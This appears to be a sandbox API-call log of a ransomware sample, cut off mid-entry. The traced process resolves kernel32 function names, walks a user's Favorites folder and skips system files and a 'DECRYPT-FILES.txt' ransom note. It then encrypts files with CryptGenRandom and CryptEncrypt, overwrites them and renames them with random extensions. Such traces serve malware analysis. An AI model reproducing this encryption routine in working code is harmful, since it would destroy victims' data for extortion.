[0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.687] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.687] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.687] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.687] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.688] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.688] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.688] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.688] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.688] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.688] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.688] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.688] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.688] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.688] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.688] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.688] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.688] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.688] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.0L2uJ") returned 66 [0185.688] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.0L2uJ.0fRy0T0") returned 74 [0185.688] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.0L2uJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.0l2uj"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.0L2uJ.0fRy0T0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.0l2uj.0fry0t0"), dwFlags=0x0) returned 1 [0185.689] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.689] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.689] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.690] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef2db20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url.0L2uJ", cAlternateFileName="MSNBCN~1.0L2")) returned 1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="DECRYPT-FILES.txt") returned 1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="autorun.inf") returned 1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="boot.ini") returned 1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="desktop.ini") returned 1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="ntuser.dat") returned -1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="iconcache.db") returned 1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="bootsect.bak") returned 1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="ntuser.dat.log") returned -1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="thumbs.db") returned -1 [0185.690] lstrcmpiW (lpString1="MSNBC News.url.0L2uJ", lpString2="Bootfont.bin") returned 1 [0185.690] lstrlenW (lpString="MSNBC News.url.0L2uJ") returned 20 [0185.690] lstrcmpiW (lpString1="0L2uJ", lpString2="lnk") returned -1 [0185.690] lstrcmpiW (lpString1="0L2uJ", lpString2="exe") returned -1 [0185.690] lstrcmpiW (lpString1="0L2uJ", lpString2="sys") returned -1 [0185.690] lstrcmpiW (lpString1="0L2uJ", lpString2="dll") returned -1 [0185.690] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.690] lstrlenW (lpString="MSNBC News.url.0L2uJ") returned 20 [0185.690] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0185.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSNBC News.url.0L2uJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.0L2uJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.0L2uJ" [0185.690] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.0L2uJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.0l2uj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.691] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.691] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.691] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.691] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.691] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.691] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.692] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.692] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.692] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.692] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.693] CloseHandle (hObject=0x268) returned 1 [0185.693] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.693] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.693] CloseHandle (hObject=0x0) returned 0 [0185.693] CloseHandle (hObject=0x264) returned 1 [0185.694] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.694] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.694] GetTickCount () returned 0x1135a8f [0185.694] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.694] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.694] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.694] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.695] lstrlenA (lpString="kernel32.dll") returned 12 [0185.695] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.695] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.695] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.695] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.695] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.695] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.695] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.695] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.695] lstrlenA (lpString="ADDATOMA") returned 8 [0185.695] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.695] lstrlenA (lpString="ADDATOMW") returned 8 [0185.695] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.695] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.695] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.696] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.696] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.696] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.696] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.696] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.696] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.696] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.696] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.696] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.696] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.696] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.696] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.696] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.696] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.696] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.696] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.696] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.696] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.696] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.696] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.697] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.697] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.697] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.697] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.697] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.697] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.697] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.697] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.697] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.697] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.697] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.697] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.697] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.697] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.697] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.697] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.697] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.697] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.697] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.697] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.698] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.698] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.698] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.698] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.698] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.698] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.698] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.698] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.698] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.698] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.698] lstrlenA (lpString="BEEP") returned 4 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.698] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.698] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.698] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.698] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.698] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.698] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.698] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.698] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.698] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.698] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.699] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.699] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.699] lstrlenA (lpString="CANCELIO") returned 8 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.699] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.699] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.699] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.699] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.699] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") 